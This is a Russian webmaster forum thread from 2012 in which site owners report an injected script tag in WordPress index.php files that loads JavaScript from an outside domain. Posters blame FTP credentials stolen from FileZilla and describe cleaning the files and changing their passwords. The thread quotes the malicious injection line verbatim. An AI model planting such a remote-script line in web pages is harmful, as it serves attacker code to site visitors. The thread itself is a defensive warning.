Вирус на сайте
Страницы: 1 2 След.
Вирус на сайте
Здравствуйте. Думаю, данную тему нужно прочитать всем, может кто-то найдёт у себя тоже подобную неприятность.И так.
Вчера Я.Вебмастер определил, что один мой сайт безопасен: появился красный значок.
Сегодня полез разбираться и обнаружил в исходном коде (который выдаёт браузер) вот такую строчку:

Код
 <script src="http://bdnbah.info/style.js"></script><script src="http://bdnbah.info/style.js"></script>


И эта строчка шла сразу же после <html>Начал смотреть другие сайты этого же хостинга (мои сайты), тоже обнаруживал эту строчку. Иногда она стояла в боди, а иногда вместо был iframe.
Проанализировав всё, пришёл к выводу, что злоумышленник получил доступ по ftp (скорее всего программа).
Ну что ж, я начал шерстить все файлы. Большинство было - движки Вордпресс. Один сайт я просмотрел полностью. Файлы определял по дате изменения. Все index были изменены 10 марта.
Вредоносная строчка дописывалась всегда в файл index.php. Удалил всё, и будут мониторить дальше. Странный джаваскрипт с сайтов пропал.
Тех, кто зайдёт в данную тему, прошу проверить парочку своих сайтов (просто html главной  страницы - это займёт у вас 5 секунд)
*Пароли естественно семенил.
Вот теперь думаю, где подхватил эту дрянь. Пару дней сидел без антивиря, быть может тогда...
О сколько нам открытий чудных готовит продвиженья путь:
И Google, сын ошибок трудных, и Yandex, парадоксов друг :)
Дешёвый хостинг для новичков и про
Была такая же проблема. Имхо, вирус\троян украл данные от FTP из FileZilla - там они не сильно шифруются насколько я в курсе.
Цитата
Дмитрий Иванов пишет:
украл данные от FTP из FileZilla
Я так тоже подумал, ибо у меня как раз этот клиент.Я его снёс нафиг, скачал свежую версию, и сейчас буду устанавливать... Хотя теперь стоит подумать. Может, какой другой клиент установить. Вы тем же самым пользуетесь?


Цитата
Дмитрий Иванов пишет:
Была такая же проблема.
Вы её устранили и... Больше подобная весчь не появлялась?
Сегодня устранил - вычистил вредоносный код из index.php и сменил все пароли - пока полет нормальный, отправил сайты на перепроверку в яндексе - он уже успел пометить парочку как потенциально опасные.

Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов, и на обоих прописался этот вирус. На остальных хостингах никаких проблем.

FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.
Я тоже подыскиваю фтп-клиент бесплатный. На файлзиллу возваращаться желания нет однозначно smile:(

Цитата
Дмитрий Иванов пишет:
FileZilla удалил, перешел на FireFTP - там все данные шифруются мастер-паролем.

Это дополнение к мозилле или есть полноценная программа? Там соединение шифруется по умолчанию? То есть доп. настроек делать не нужно?
Дополнение. При каждом запуске спрашивает мастер пароль которым и шифруются данные от FTP. Дополнительных настроек не нужно.
Цитата
Дмитрий Иванов пишет:
Проблема однозначно в FileZilla - там у меня были прописаны данные от 2-х хостингов
Ставьте "с запросом" и не будет проблем, имейте привычку менять пароли каждую неделю
Хостинг Beget на СУПРе
Здравствуйте, мой сайт joy-game.ru/ и его отправили в АГС за эту фигню. Как её убрать? FileZill(ой) не пользовался, в начале данного скрипта нету. Помогите пожалуйста. Кстати, хочу подчеркнуть, если ввести этот код в гугл или яндекс, то на форумах, просят о помощи после 10 марта 2012 года(Что и странно). И как можно убрать?
Цитата
grant1425 пишет:
просят о помощи после 10 марта 2012 года
Да кстати. Наплыв какой-то по вирусам. Нехорошая тенденция.
grant1425, Не стал открывать сайт.... что за ПП стоят на сайте? шаб откуда? сприпты с левых доменов ставили?
Роман, сайт не изменял 4 недели или даже больше. Не чего не было и вдруг где-то числа 11 вирусняк появился
grant1425, Вирусняк на ucoze smile:confused: это только вы сами могли натворить
Изменено: Роман - 13 Марта 2012 20:49
Роман, по твоему появился скрипт и все полезли его брать? И вирусы появились...
grant1425, Я хочу сказать, это полностью ваша вина, что подхватили какую то х. Смените шаблон, убейте Гротаторы
Спасибо за тему. Долго думал где он находится. Сразу что то не догадался глянуть в index
Страницы: 1 2 След.
Похожие темы:
Читают тему (гостей: 2, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
13:12 Покупные ссылки 
12:57 Rotapost прикрыли! Чем пользоваться? 
17:00 Стоит ли добавлять сайт в Rambler топ 100? 
15:12 Ночной бар в Паттайе: как случайная встреча с "тайкой" и её кадыком перевернула мой взгляд на продвижение сайта в Google 2026 
15:01 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
07:24 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
12:05 DLE не создает бэкап с админки сайта, как быть? 
15:21 Продажа сайтов по электронике 
14:04 Quix Email - сервис почтовых активаций 
13:57 Сервис смс активаций и аренды мобильных номеров ALISMS 
13:40 PAY2DAY.TOP - Покупка и продажа криптовалюты за рубли. 
12:41 Trustpilot Reviews | Подниму рейтинг вашей компании 
12:40 №1 Рассылка / Инвайтинг [TELEGRAM] | Приватный метод 
12:40 Продвижение YouTube видео в топ поиска | Любой тип контента | Гарантия результата 
15:07 Добро пожаловать в цифровой мир... 
22:12 BYTIK.shop – сервис по продвижению в популярных социальных сетях​ 
10:10 накрутка трафика в SimilarWeb 
16:50 Компьютерная мышь 
11:32 Про мясо 
22:11 С юмором по жизни! 
23:03 Точные прогнозы на футбол